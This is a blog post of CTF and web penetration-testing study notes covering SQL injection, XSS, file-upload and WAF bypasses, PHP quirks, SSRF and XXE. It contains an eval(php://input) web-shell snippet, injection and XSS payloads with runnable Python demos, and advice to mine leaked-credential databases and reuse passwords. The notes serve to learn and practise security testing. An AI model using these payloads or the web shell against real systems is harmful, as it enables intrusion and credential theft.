<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="My Note"><meta name="keywords" content="web,sql,note"><meta name="author" content="MOZac Connecter"><title>My Note | MOZac的小屋</title></head><body><div id="content-outer"><div id="post-info"><div id="post-title">My Note</div><div id="post-meta"><time class="post-meta__date">2020-08-07</time><span class="post-meta__separator">|</span><a class="post-meta__categories" href="/categories/%E7%AC%94%E8%AE%B0/">Notes</a></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>Notes</h1><p>1. Information gathering</p>
<p>2. Log in to the admin backend -&gt; getshell</p>
<p>3. Getshell fails -&gt; change approach -&gt; hunt for other vulnerabilities (SQL injection and the like) -&gt; dump the database to collect user information</p>
<p>4. Obtain user passwords -&gt; try them against mailboxes (credential reuse) -&gt; pull key information from the mailbox -&gt; obtain VPN access</p>
<p>5. Reach the file server through the VPN -&gt; write a script to getshell</p>
<h1 id="CTF学习"><a href="#CTF学习" class="headerlink" title="CTF学习"></a>CTF learning</h1><p>1. XSS against the admin backend -&gt; 403 -&gt; fetch the page with AJAX and relay it back out -&gt; SQL injection -&gt; getshell</p>
<p>2. Bypass the WAF to inject (%00, ||, seselectlect and so on); a common challenge type in mainland-China CTFs</p>
<p>3. Code audit: juggling PHP's many quirks (deserialization, weak typing)</p>
<p>4. File upload: creative upload bypasses (.php111, .inc, .phpt)</p>
<p>5. Whatever vulnerability is currently hot</p>
<p>Path scanning -&gt; phpinfo() -&gt; PHP 7 -&gt; PHP 7 OPcache -&gt; read the documentation -&gt; dodge the pitfalls -&gt; getshell</p>
<p>6. Social engineering (common passwords)</p>
<p>7. Several web vulnerabilities mixed together</p>
<p>8. Realistic penetration scenarios with an internal network</p>
<h1 id="记大佬的渗透测试记录"><a href="#记大佬的渗透测试记录" class="headerlink" title="记大佬的渗透测试记录"></a>Notes from an expert's penetration-test records</h1><pre><code>1. Gather information on the target
2. The main site cannot be taken, so go for the subdomains
3. Enumerate the subdomains
4. From the subdomain names, start with sites that offer operations such as upload or edit
5. If an SVN leak (.svn exposed) exists, try to restore the source from the wc.db entries (an SQLite database)
6. Audit the source: locate code quickly by searching the whole tree for dangerous operations such as exec, upload and include
7. Find an exec command-execution sink and notice that it requires administrator privileges
8. Trace the code back, locate the admin login, and find that the cookie algorithm can be broken
9. Forge the cookie and get a reverse shell; once on the box, find many sites hosted there but not enough privileges
10. Check the version
11. Escalate privileges with a one-liner from an earlier CTF, then sweep the whole box


1. Routine information gathering and reconnaissance
2. Guess the username and password (combinations of the site's domain name and phone number)
3. Log in to the backend and test the file-upload function: any file containing &lt;?php is intercepted
4. Brainwave: &lt;script language=&quot;php&quot;&gt; (the alternative PHP open tag, removed in PHP 7) passes the check and gets a shell
</code></pre>
<h1 id="web狗如何在CTF-web中的套路中实现反套路"><a href="#web狗如何在CTF-web中的套路中实现反套路" class="headerlink" title="web狗如何在CTF-web中的套路中实现反套路"></a>How a web player counters the tricks of CTF web challenges</h1><blockquote>
<p>Lecturers: 三十, 伪赛棍</p>
</blockquote>
<h2 id="题目类型"><a href="#题目类型" class="headerlink" title="题目类型"></a>Challenge types</h2><pre><code>1. SQL injection
2. XSS
3. Code audit
4. File upload
5. PHP quirks
6. Backend login
7. Encryption/decryption
8. Others: brain-teasers, riddles, combinations with the above
</code></pre>
<p>SQL injection</p>
<pre><code>1. Simple injection
	', and 1=1, or 1=1, xor 1=1
2. Wide-byte injection
	GBK character-set encoding, used to bypass escaping filters
3. Creative MySQL bypasses
	intervalue(), numeric injection
4. Bypassing keyword detection and blocking
	keyword doubling (selselectect)
5. MongoDB injection
	NoSQL injection (NoSQLMap)
6. HTTP header injection
	X-Forwarded-For injection, IP-address injection, Referer injection
7. Second-order injection
	the payload is stored by one page and triggers on another
</code></pre>
<h4 id="SQL注入工具"><a href="#SQL注入工具" class="headerlink" title="SQL注入工具"></a>SQL injection tools</h4><pre><code>1. Burp Suite
2. HackBar
3. sqlmap
4. NoSQLMap
</code></pre>
<h4 id="SQL解题思路"><a href="#SQL解题思路" class="headerlink" title="SQL解题思路"></a>SQL injection: approach</h4><pre><code>Easy: run sqlmap
Find the injection point: is it in an HTTP header? in an image parameter? and so on
Determine the injection type
Use the error messages (error-based injection)
Try the various filter bypasses
Check whether the injection lives in a shared module used by several pages
Time-based injection (for blind cases)
</code></pre>
<h4 id="SQL注入技巧"><a href="#SQL注入技巧" class="headerlink" title="SQL注入技巧"></a>SQL injection tricks</h4><pre><code>sql_mode="STRICT_TRANS_TABLES" (off by default before MySQL 5.7; on by default from 5.7, where the truncation below becomes an error instead)
	Insert truncation: inserting "admin&lt;many spaces&gt;X" into a narrow column stores a second "admin" row, giving a bypass or access to another user's account
Watch for second-order injection
	ISG 2015 web350: the username is taken straight from the session into the query; exploits the column length
	truncation: a \ becomes \\ after gpc escaping, but truncation leaves a single \, which triggers the injection
If the column names cannot be guessed, find the admin backend and read its source: the field names in the login form usually match the database column names
Bypassing Safedog (安全狗)
	se%lect
 For ASP + Access, first dig into the database's quirks:
	1. Space substitutes: %09, %0A, %0C, %0D
	2. Characters that truncate the rest of the statement like a comment: %00, %16, %22, %27
	3. Once the %09/%0A/%0C/%0D padding exceeds a certain length, Safedog's detection fails
	4. User-Agent: BaiduSpider
With magic_quotes_gpc=On, a quote ' in a submitted parameter is automatically escaped to \', which defeats many injection attacks
</code></pre>
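<p>The tricks above (a tautology or comment as a "universal password", keyword stripping defeated by doubled keywords, and blind extraction through a true/false oracle) in runnable form. This is an added example, not code from the talk or from this page: it uses Python's built-in sqlite3 so it runs offline, the users table, the credentials and the toy keyword filter are constructed for the demonstration, and the query shapes stand in for the MySQL targets the notes describe. It also covers the universal-password item in the backend-login section further down.</p>

```python
import re
import sqlite3
import string

# Constructed fixture: an in-memory database standing in for the target's users table.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "S3cr3t!"), ("guest", "guest")])
    return db

# Vulnerable: user input is concatenated into the statement (the "simple injection" case).
def login_vulnerable(db, username: str, password: str) -> bool:
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return db.execute(sql).fetchone() is not None

# Hardened: the same check with bound parameters; input can never change the query structure.
def login_safe(db, username: str, password: str) -> bool:
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# Vulnerable profile lookup that returns data, so a UNION can exfiltrate a column.
def lookup_vulnerable(db, username: str):
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a WAF-mangled statement no longer parses
    return row[0] if row else None

# Toy "keyword detection" filter: deletes each blacklisted keyword once (case-insensitive).
# Doubling the keyword (selselectect) leaves the real keyword behind after the deletion.
BLACKLIST = ("select", "union")
def naive_filter(payload: str) -> str:
    for word in BLACKLIST:
        payload = re.sub(word, "", payload, count=1, flags=re.IGNORECASE)
    return payload

# Boolean-based blind extraction of admin's password through the login oracle.
# A time-based variant only swaps the true/false signal for a delay (sqlite has no SLEEP()).
def blind_extract(db, max_len: int = 32) -> str:
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*()_+-=."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"admin' AND substr(password,{pos},1)='{ch}'--"
            if login_vulnerable(db, probe, "x"):
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered

def demo() -> dict:
    db = make_db()
    comment_out = "admin'-- "   # universal password: comment away the password check
    tautology = "x' OR '1'='1"  # classic tautology, supplied in the password field
    union = "' UNION SELECT password FROM users WHERE username='admin'--"
    doubled = "' UNunionION SELselectECT password FROM users WHERE username='admin'--"
    return {
        "comment_bypasses_vulnerable": login_vulnerable(db, comment_out, "wrong"),
        "tautology_bypasses_vulnerable": login_vulnerable(db, "admin", tautology),
        "comment_bypasses_safe": login_safe(db, comment_out, "wrong"),
        "plain_union_blocked": lookup_vulnerable(db, naive_filter(union)) is None,
        "doubled_union_leaks": lookup_vulnerable(db, naive_filter(doubled)),
        "blind_extracted": blind_extract(db),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

<p>The doubled-keyword payload only works because the filter runs once and never re-scans its own output; the same holds for the page's se%lect and %00 tricks, which rely on the WAF and the database tokenizing the input differently. The parameterised login rejects every payload here without any filtering at all.</p>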
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><pre><code>Easy: stored XSS, fired blind at the admin backend
Bypassing the browsers' XSS auditors
Bypassing rich-text filter blacklists and whitelists
CSP bypass
Flash XSS
AngularJS client-side template XSS
.....
</code></pre>
<h4 id="XSS注入工具"><a href="#XSS注入工具" class="headerlink" title="XSS注入工具"></a>XSS tools</h4><pre><code>Burp Suite
HackBar
XSS platform (hosted payload and cookie-collector service)
SWF decompiler
flasm
DoSWF (SWF obfuscator)
Crypt Flow (SWF obfuscator)
......
</code></pre>
<h4 id="XSS解题思路"><a href="#XSS解题思路" class="headerlink" title="XSS解题思路"></a>XSS: approach</h4><pre><code>Simple XSS: fire blind through an XSS platform and collect the admin's cookie
Tags are filtered: try the various bypasses
A security policy such as CSP is present: try the corresponding bypasses
Reverse the .swf, audit the source, build an XSS payload
......
</code></pre>
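<p>The "filter blacklist bypass" item above, as an added example (not code from the talk or the page): a toy server-side blacklist that strips &lt;script&gt; tags and the javascript: scheme, next to the correct fix for a text context, which is escaping the output. The payloads and the crude "would this execute" check are constructed for the demonstration; the check is a stand-in for a browser and only looks for a script tag, an on* handler or a javascript: URL inside a tag. For genuine rich text the fix is an allowlist sanitizer, not escaping, but the blacklist fails for the same reason either way.</p>

```python
import html
import re

# Toy blacklist filter of the kind rich-text "blacklist" checks use: remove <script> tags
# and the javascript: scheme in a single pass, nothing else.
def blacklist_filter(fragment: str) -> str:
    fragment = re.sub(r"<\s*/?\s*script[^>]*>", "", fragment, flags=re.IGNORECASE)
    fragment = re.sub(r"javascript:", "", fragment, flags=re.IGNORECASE)
    return fragment

# Hardened output for an HTML text context: every <, >, &, " and ' becomes an entity,
# so no tag survives and the browser has nothing to execute.
def escape_for_html(fragment: str) -> str:
    return html.escape(fragment, quote=True)

# Crude stand-in for the browser's decision: does any tag in the rendered output start a
# script, carry an event-handler attribute, or point at a javascript: URL?
TAG = re.compile(r"<[^>]*>")
ACTIVE_IN_TAG = re.compile(r"\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)
def still_executes(rendered: str) -> bool:
    for tag in TAG.findall(rendered):
        if re.match(r"<\s*script\b", tag, re.IGNORECASE) or ACTIVE_IN_TAG.search(tag):
            return True
    return False

# Constructed payloads: the one the blacklist was written for, and two it never considered.
PAYLOADS = {
    "plain_script": "<script>alert(1)</script>",
    "event_handler": "<img src=x onerror=alert(1)>",
    "nested_tag": "<scr<script>ipt>alert(1)</scr<script>ipt>",  # the deletion reassembles <script>
}

def evaluate() -> dict:
    """For each payload: does it still execute after the blacklist, and after escaping?"""
    return {
        name: {
            "blacklist_bypassed": still_executes(blacklist_filter(payload)),
            "escaping_bypassed": still_executes(escape_for_html(payload)),
        }
        for name, payload in PAYLOADS.items()
    }

if __name__ == "__main__":
    for name, result in evaluate().items():
        print(name, result, repr(blacklist_filter(PAYLOADS[name])))
```

<p>The nested payload is the textbook case: a single-pass deletion of &lt;script&gt; turns &lt;scr&lt;script&gt;ipt&gt; back into &lt;script&gt;, and the event-handler payload never contained the blacklisted token at all. Escaping does not try to recognise attacks, so there is nothing to bypass.</p>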
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>File upload</h3><p>Types:</p>
<ul>
<li>Null-byte (%00) truncation upload</li>
<li>Bypass by upper-casing multipart/form-data</li>
<li>Creative file extensions (.php345, .inc, .phtml, .phps)</li>
<li>The various file-content checks</li>
<li>The various parsing vulnerabilities (nginx + FastCGI)</li>
<li>Creative Safedog-beating tricks</li>
<li>Online-editor vulnerabilities such as FCKeditor</li>
<li>FCKeditor 2.0 up to (but not including) 2.2 allows uploads with the extensions asa, cer, php2, php4, inc, pwml and pht; the saved path is built as $sFilePath = $sServerDir . $Filename rather than from $sExtension, so on Windows appending a trailing "." to the filename defeats the check (Windows drops the trailing dot when the file is created)</li>
<li>File inclusion</li>
</ul>
<h4 id="文件上传工具"><a href="#文件上传工具" class="headerlink" title="文件上传工具"></a>File upload tools</h4>
<ul>
<li>HackBar</li>
<li>Burp Suite</li>
<li>Webshell</li>
<li>China Chopper (中国菜刀)</li>
<li>AntSword</li>
</ul>
<h4 id="文件上传解题思路"><a href="#文件上传解题思路" class="headerlink" title="文件上传解题思路"></a>File upload: approach</h4>
<ul>
<li>Simple upload: look at the response</li>
<li>Is the extension or format check only in the front end? Intercept the request and change it</li>
<li>Is there a truncation upload bug?</li>
<li>Is the file header checked? (image with an embedded webshell, and so on)</li>
<li>Is the content checked? Try the bypasses</li>
<li>Is the uploaded shell being flagged by AV? Obfuscate it</li>
<li>Are there parsing vulnerabilities?</li>
<li>HTTP headers end with two CRLFs (\r\n\r\n); when \r\n is not filtered, a \r\n in a URL parameter terminates the header block so that injected content follows it</li>
<li>... <strong>Practice: HTCTF-2016 challenge 14</strong></li>
</ul>
<h4 id="php特性"><a href="#php特性" class="headerlink" title="php特性"></a>PHP quirks</h4>
<ul>
<li>Weak typing</li>
<li>intval</li>
<li>strpos and ==</li>
<li>Deserialization + __destruct</li>
<li>\0 truncation</li>
<li>iconv truncation (%00 truncation)</li>
<li>parse_str</li>
<li>Stream wrappers ("pseudo-protocols", I/O stream operations)</li>
</ul>
<h4 id="PHP特性-工具"><a href="#PHP特性-工具" class="headerlink" title="PHP特性-工具"></a>PHP quirks: tools</h4>
<ul>
<li>HackBar</li>
<li>Burp Suite</li>
<li><a target="_blank" rel="noopener" href="http://www.shucunwang.com/RunCode/php">Online PHP sandbox</a></li>
</ul>
<h4 id="php特性-解题思路"><a href="#php特性-解题思路" class="headerlink" title="php特性-解题思路"></a>PHP quirks: approach</h4>
<ul>
<li>Check for PHP truncation quirks</li>
<li>Read the source and check for weak-typing issues</li>
<li>Read the source and watch for special functions: eval(), system(), intval()</li>
<li>Construct the variables and get the flag</li>
<li>HTTP parameter pollution: send the same parameter twice and see which value the backend uses</li>
<li>Magic hashes: md5('240610708') == md5('QBKCDZO') is true under PHP's loose comparison, because the two digests (0e462097431906509019562988736854 and 0e830400451993494058024219903391) both look like numeric strings in scientific notation and compare as 0 == 0; === compares the strings and is not fooled</li>
<li>...</li>
</ul>
<h4 id="php特性-伪协议"><a href="#php特性-伪协议" class="headerlink" title="php特性-伪协议"></a>PHP quirks: stream wrappers</h4>
<ul>
<li>php://filter reads and writes local files through a filter chain; for example <a target="_blank" rel="noopener" href="http://localhost/test/index.php?file=php://filter/read=convert.base64-encode/resource=index.php">http://localhost/test/index.php?file=php://filter/read=convert.base64-encode/resource=index.php</a> returns the source of index.php Base64-encoded, so the include delivers the code instead of executing it</li>
</ul>
<p>php://input needs server support; as the target of <code>include</code>/<code>require</code> it also requires <code>allow_url_include=On</code>. Reading it with <code>file_get_contents()</code>, as below, does not.</p>
<pre><code>&lt;?php
@eval(file_get_contents('php://input'));
?&gt;

POST body: system('ifconfig');
</code></pre>
<p>eval() takes bare code, so the body carries no <code>&lt;?php ... ?&gt;</code> tags; a body of <code>&lt;?php system('ifconfig');?&gt;</code> belongs to the <code>include('php://input')</code> variant instead.</p>
<ul>
<li>php://memory always keeps the data in memory</li>
<li>php://temp keeps the data in memory until a predefined limit (2 MB by default) is reached, then spills it to a temporary file</li>
<li>...</li>
</ul>
<p>1. The data: wrapper (watch the punctuation: a semicolon introduces parameters such as ;base64, and a single comma separates the header from the payload; as an include target it also needs allow_url_include=On)</p>
<ul>
<li>data:,text data</li>
<li>data:text/plain,text data</li>
<li>data:text/html,HTML code</li>
<li>data:text/css;base64,CSS code</li>
<li>data:text/javascript;base64,JavaScript code</li>
<li>encoded icon data</li>
<li>encoded GIF image</li>
<li>encoded PNG image</li>
<li>encoded JPEG image</li>
</ul>
<p>glob:// finds pathnames matching a pattern</p>
<h3 id="后台登录类"><a href="#后台登录类" class="headerlink" title="后台登录类"></a>Backend login</h3>
<ul>
<li>Universal-password bypass</li>
<li>Variants of the universal password</li>
<li>Social-engineering the backend password</li>
<li>Brute-forcing the backend password</li>
<li>Login bypasses in the various CMSes</li>
</ul>
<h4 id="后台登录类-工具"><a href="#后台登录类-工具" class="headerlink" title="后台登录类-工具"></a>Backend login: tools</h4>
<ul>
<li>Burp Suite</li>
<li>HackBar</li>
<li>sqlmap</li>
<li>Social-engineering databases (leaked credential dumps)</li>
<li>...</li>
</ul>
<h4 id="后台登录类解题思路"><a href="#后台登录类解题思路" class="headerlink" title="后台登录类解题思路"></a>Backend login: approach</h4>
<ul>
<li>From the hints, decide whether it is an ordinary login bypass or a social-engineering task</li>
<li>For an ordinary login bypass, try the universal passwords and their variants, obtain credentials through a SQL injection, or fire XSS blind</li>
<li>If it is a CMS login, look for a known backend bypass for that version</li>
<li>Social engineering (Google, Baidu, leaked databases)</li>
<li>Brute force</li>
<li>...</li>
</ul>
<h3 id="加密解密类-考察知识点"><a href="#加密解密类-考察知识点" class="headerlink" title="加密解密类-考察知识点"></a>Encryption/decryption: knowledge points</h3>
<ul>
<li>Simple encodings (several rounds of Base-family encoding)</li>
<li>Crypto puzzles (hash length extension, XOR, shift ciphers, assorted variants)</li>
<li>JavaScript encryption and decryption</li>
<li>Writing the decryption from the encryption source</li>
<li>...</li>
</ul>
<h4 id="加解密类-工具"><a href="#加解密类-工具" class="headerlink" title="加解密类-工具"></a>Encryption/decryption: tools</h4>
<ul>
<li>Assorted encoding converters</li>
<li>Burp Suite</li>
<li>Browser console</li>
<li>...</li>
</ul>
<h4 id="加解密类-解题思路"><a href="#加解密类-解题思路" class="headerlink" title="加解密类-解题思路"></a>Encryption/decryption: approach</h4>
<ul>
<li>Decide whether it is an encoding or an encryption</li>
<li>If an encoding, identify it and decode, repeatedly if necessary</li>
<li>If an encryption, decide whether it is a standard algorithm or a home-made one</li>
<li>Is it symmetric? Has the key leaked? Recover the key and decrypt</li>
<li>Derive the decryption routine from the encryption algorithm</li>
<li>...</li>
</ul>
<h3 id="其它类型"><a href="#其它类型" class="headerlink" title="其它类型"></a>Other types</h3>
<p>Social engineering: creative searches of leaked-credential databases, Weibo, QQ signatures, whois, Google</p>
<p>Example: ISG CTF 2014 Web4 火眼金睛</p>
<ul>
<li>Google for the Tianya (天涯) leaked database; it can be searched at <a target="_blank" rel="noopener" href="http://www.findmima.com">http://www.findmima.com</a></li>
</ul>
<p>SSRF, including creative port probing, 302 redirects, creative protocol abuse, gopher:// to get a shell directly, and so on</p>
<p>Example: XDCTF2015 Web1 300</p>
<ul>
<li>This one is SSRF; you are greeted by a single input box. Exploit the SSRF by trying <code>file://index.php</code> directly, which reads back the source of index.php; then audit the code.</li>
</ul>
<p>Protocol tricks: creative IP spoofing via X-Forwarded-For / X-Client-IP / X-Real-IP / CDN-Src-IP, creative flag hiding, creative packet analysis</p>
<p>Example: HCTF2014 jianshu (400pt). Approach:</p>
<ul>
<li>Submit an HTML-encoded payload by modifying the request in Burp; it yields an IP address and a review link. The XSS returns the remote IP 218.75.123.186 and the backend page <a target="_blank" rel="noopener" href="http://121.41.37.11:2504/get.php?user=V1ew">http://121.41.37.11:2504/get.php?user=V1ew</a>. Spoofing X-Forwarded-For logs you in, but there is no flag. A hint says to change approach: the next step is a SQL injection that yields the admin password, then <a target="_blank" rel="noopener" href="http://121.41.37.11:25045/get.php?user=A1rB4s1C">http://121.41.37.11:25045/get.php?user=A1rB4s1C</a> with X-Forwarded-For: 218.75.123.186 to spoof the IP and log in.</li>
<li>XXE: wherever XML turns up (RSS, Word documents, streaming media) and the various XXE exploitation methods (file read). Example: AliCTF-Quals-2014 Web-300</li>
</ul>
<p>Recommended <strong>classic example</strong>: <a target="_blank" rel="noopener" href="http://lab10.wargame.whitehat.vn/web007">http://lab10.wargame.whitehat.vn/web007</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info">MOZac Connecter</span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/08/07/My-Note/">https://mozac-void.yixiangtang.icu/2020/08/07/My-Note/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">License: </span><span class="post-copyright-info">Unless stated otherwise, all posts on this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a>. When republishing, please credit <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/sql/">sql</a><a class="post-meta__tags" href="/tags/note/">note</a></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div></div></footer></body></html>